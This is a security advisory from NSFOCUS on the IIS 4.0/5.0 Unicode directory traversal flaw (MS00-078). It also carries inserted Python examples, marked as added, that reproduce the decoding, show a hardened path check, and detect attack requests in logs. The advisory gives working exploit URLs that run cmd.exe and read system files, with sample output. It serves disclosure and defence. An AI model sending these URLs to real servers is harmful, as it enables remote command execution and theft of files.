NSFOCUS Security Advisory(SA2000-06)

Topic: Microsoft IIS 4.0/5.0 Web Directory Traversal Vulnerability

Release Date: Oct 20, 2000


Affected system:
============


Microsoft IIS 4.0
Microsoft IIS 5.0
    - Microsoft Windows NT 4.0
    - Microsoft Windows 2000

Impact:
======


The NSFOCUS security team has found a security flaw in the UNICODE decoding
implementation of Microsoft IIS 4.0/5.0. By exploiting this vulnerability, a
remote malicious user may run arbitrary commands on, or read the content of
system files from, a web server running a vulnerable IIS.

Description:
=========


When IIS 5.0 (Chinese version) finds "%c1%hh" or "%c0%hh" (0x00 <= 0xhh
< 0x40) in the file name, it decodes "%c1%hh" to (0xc1 - 0xc0) *
0x40 + 0xhh, and "%c0%hh" to (0xc0 - 0xc0) * 0x40 + 0xhh.

For example (Windows 2000 + IIS 5.0 + SP1, Simplified Chinese version):

http://target/A.ida/%c1%00.ida
IIS says "@.ida" cannot be found
here: (0xc1-0xc0)*0x40+0x00=0x40='@'

http://target/A.ida/%c1%01.ida
IIS says "A.ida" cannot be found
here: (0xc1-0xc0)*0x40+0x01=0x41='A'

http://target/A.ida/%c1%02.ida
IIS says "B.ida" cannot be found
.....

http://target/A.ida/%c0%21.ida
IIS says "!.ida" cannot be found
....

This means most characters can be encoded with this feature.

For example:

%c1%1c -> (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '\'
%c0%2f -> (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '/'

So an attacker can bypass the IIS check for "..\" with this trick, which
makes it possible to run arbitrary commands and read system files.

Note: Rain Forest Puppy (rfp@WIRETRIP.NET) has found the same bug
in IIS for other language versions. All that is needed is to change
"%c1%1c" into "%c1%9c", or "%c0%2f" into "%c0%af".
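The decoding rule above, and the reason a check applied before decoding is bypassed, as an added Python example (not code from the advisory or from Microsoft): it reproduces the (0xc1 - 0xc0) * 0x40 + 0xhh arithmetic, applies a segment-wise ".." check to the raw and to the decoded path, and shows the decode-then-canonicalise order a server should use instead. The web root d:\inetpub and the masking of the second byte with 0x3f (which makes the %c1%9c / %c0%af variants decode the same way) are assumptions made for the example.

```python
import ntpath
import re

HEX2 = re.compile(r"%([0-9A-Fa-f]{2})")


def decode_iis_overlong(path: str) -> str:
    """Decode %XX escapes the way the advisory describes the vulnerable decoder.

    A lead byte of 0xC0 or 0xC1 followed by a second escaped byte is folded
    into one character: (lead - 0xC0) * 0x40 + the low six bits of the second
    byte. For 0x00 <= hh < 0x40 this is exactly the advisory's formula; masking
    with 0x3F is an assumption that also covers the %c1%9c / %c0%af variants.
    A strict UTF-8 decoder rejects all of these: 0xC0/0xC1 lead bytes are
    always overlong and never valid.
    """
    out = []
    i = 0
    while i < len(path):
        m = HEX2.match(path, i)
        if not m:
            out.append(path[i])
            i += 1
            continue
        lead = int(m.group(1), 16)
        i = m.end()
        m2 = HEX2.match(path, i)
        if lead in (0xC0, 0xC1) and m2:
            second = int(m2.group(1), 16)
            i = m2.end()
            out.append(chr(((lead - 0xC0) << 6) | (second & 0x3F)))
        else:
            out.append(chr(lead))
    return "".join(out)


def naive_rejects(raw_path: str) -> bool:
    """The kind of check the advisory says is bypassed: look for a '..'
    path segment in the request *before* the escapes are decoded."""
    return any(seg == ".." for seg in re.split(r"[/\\]", raw_path))


# Constructed web root; matches the "Directory of d:\inetpub\scripts" listing.
WEBROOT = r"d:\inetpub"


def is_within_webroot(raw_path: str, webroot: str = WEBROOT) -> bool:
    """Hardened order: decode first, canonicalise, then compare against the
    root. Returns True only if the resolved path stays under the web root."""
    decoded = decode_iis_overlong(raw_path).replace("/", "\\")
    resolved = ntpath.normpath(ntpath.join(webroot, decoded.lstrip("\\")))
    root = ntpath.normpath(webroot).lower()
    return resolved.lower().startswith(root + "\\")


if __name__ == "__main__":
    for enc in ("%c1%00", "%c1%01", "%c0%21", "%c1%1c", "%c0%2f", "%c1%9c", "%c0%af"):
        print(f"{enc} -> {decode_iis_overlong(enc)!r}")
    probe = "/scripts/..%c1%1c../winnt/system32/cmd.exe"
    print("naive check rejects:", naive_rejects(probe))       # False: the '..\' is hidden
    print("decoded path:", decode_iis_overlong(probe))
    print("stays under web root:", is_within_webroot(probe))  # False
```

The point of the second function is that the '..' segment does not exist until after decoding, so a check run on the encoded request sees a harmless segment "..%c1%1c.."; the third function shows that validating the canonicalised path after decoding does not depend on spotting any particular encoding.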


Exploit:
=====


(1) Running an arbitrary command:

http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

IIS will return something like this:

 Directory of d:\inetpub\scripts

2000-09-28  15:49       <DIR>          .
2000-09-28  15:49       <DIR>          ..
1999-07-21  17:49              147,456 Count.exe
2000-09-12  17:08             1438,290 Count25.exe
2000-10-13  15:03               18,867 counter.err
2000-08-23  23:07             1160,002 counter.exe
1999-05-25  18:14               13,925 CCountNT.html
1999-07-21  17:49              164,512 extdgts.exe
2000-08-10  15:24              146,352 ism.dll
1999-07-21  17:49              164,512 mkstrip.exe
1999-05-25  18:18               11,317 README.txt
2000-09-28  15:49       <DIR>          wcount
               9 File(s)        935,233 bytes

(2) The content of some system files can also be read with this bug:

http://target/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini

IIS deems it to be a request for an .ASP file, so it calls asp.dll to open
the file win.ini.

For IIS 4.0 + SP6 (Chinese), the URL above fails; it seems that IIS is getting
smarter. But, interestingly, we found that the following malformed URL can
still trick IIS into returning winnt.ini:

http://target/default.asp/a.exe/..%c1%1c../..%c1%1c../winnt/winnt.ini

"default.asp" should be an existing .ASP file.
"a.exe" is an arbitrary .EXE file name; it need not exist.
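Finding requests of the two kinds shown above in IIS logs, as an added Python example that is not part of the advisory. The sample log lines are constructed in the W3C extended format IIS writes; the detector flags any %c0 or %c1 lead byte in the URI stem or query (these are overlong sequences that no valid UTF-8 encoder ever emits, so a single hit is high-signal) and records whether the stem also carries a ".." or names cmd.exe. The IP addresses and file names in the sample are invented.

```python
import re
from collections import Counter

# Constructed sample in IIS W3C Extended Log File Format (not taken from the advisory).
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2000-10-20 15:49:00
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2000-10-20 15:49:01 10.0.0.5 GET /default.asp - 200
2000-10-20 15:49:02 10.0.0.5 GET /scripts/count.exe - 200
2000-10-20 15:49:03 192.0.2.10 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 200
2000-10-20 15:49:04 192.0.2.10 GET /a.asp/..%c1%1c../..%c1%1c../winnt/win.ini - 200
2000-10-20 15:49:05 192.0.2.10 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2000-10-20 15:49:06 10.0.0.7 GET /images/logo.gif - 304
"""

# Two-byte escape with an overlong lead byte (0xC0 or 0xC1). Valid UTF-8 never
# starts a sequence with these bytes, whatever the second byte is.
OVERLONG = re.compile(r"%c[01]%[0-9a-f]{2}", re.IGNORECASE)


def parse_w3c(text: str):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split(" ")
        if fields is None or len(values) != len(fields):
            continue  # malformed or header-less line; skip rather than guess
        yield dict(zip(fields, values))


def find_unicode_traversal(text: str) -> list:
    """Return one finding per request whose stem or query contains an overlong escape."""
    findings = []
    for rec in parse_w3c(text):
        stem = rec["cs-uri-stem"]
        if not OVERLONG.search(stem + " " + rec["cs-uri-query"]):
            continue
        reasons = ["overlong-utf8"]
        if ".." in stem:
            reasons.append("dot-dot")
        if "cmd.exe" in stem.lower():
            reasons.append("cmd.exe")
        findings.append({
            "c-ip": rec["c-ip"],
            "cs-uri-stem": stem,
            "sc-status": rec["sc-status"],
            "reasons": reasons,
        })
    return findings


def offenders_by_ip(findings: list) -> Counter:
    """Count flagged requests per client address for triage."""
    return Counter(f["c-ip"] for f in findings)


if __name__ == "__main__":
    hits = find_unicode_traversal(SAMPLE_LOG)
    for h in hits:
        print(h["c-ip"], h["sc-status"], ",".join(h["reasons"]), h["cs-uri-stem"])
    print(offenders_by_ip(hits))
```

A 200 status on a flagged line means the server actually served the request; a 404 on the same pattern is a probe that did not succeed, which is still worth recording because the decoding examples in the advisory are all 404 responses.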


Workaround:
=========


1. If executable CGI is not required, delete the executable virtual directories
   such as /scripts.
2. If an executable virtual directory is needed, we suggest assigning it a
   separate local drive.


Solution:
=======


Microsoft has released one security bulletin concerning this flaw.

The bulletin is live at :

http://www.microsoft.com/technet/security/bulletin/MS00-078.asp

Patches are available at:

- Microsoft IIS 4.0:

http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp

- Microsoft IIS 5.0:

http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp

DISCLAIMER:
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE ADVISORY IS NOT MODIFIED IN ANY WAY.

Copyright 1999-2003 NSFOCUS. All Rights Reserved.

NSFOCUS Security Team <security@nsfocus.com>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)

PGP Key: http://www.nsfocus.com/homepage/research/pgpkey.asc
Key fingerprint = F8F2 F5D1 EF74 E08C 02FE 1B90 D7BF 7877 C6A6 F6DA